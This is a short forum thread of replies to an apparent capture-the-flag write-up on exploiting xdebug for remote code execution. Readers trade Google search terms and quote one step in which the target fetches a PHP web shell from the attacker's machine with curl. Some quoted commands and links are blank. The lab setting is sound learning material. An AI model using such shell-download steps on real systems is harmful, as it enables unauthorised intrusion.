• Great post. When I was doing the box I never thought to use Nikto and it took me quite a while to notice that first foothold!

    Lesson learned, thanks.



    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I can't help. This isn't Twitter so my DMs are always open.

  • edited October 2018

    Thank you very much for your writeups.

    May I ask you 2 questions:

    ..........Question 1:

    I wonder what keywords in Google you used to find this link:

    I tried these keywords in Google without success.
    xdebug exploit
    xdebug exploit shell
    xdebug exploit rce
    xdebug exploit repository
    xdebug vulnerabilities
    xdebug php exploit

    ..........Question 2 has 2 sub questions:

    You wrote in your writeup:

    ./ -u

    We upload a shell; from the obtained shell:

    curl -O http://miIp/shell.php

    ..........Is this "" the code copied from

    ..........I guess
    the IP address of my Kali Linux?

    Please advise.

    Thanks a million.

  • I guess the keywords to search on Google were:

    php debug rce
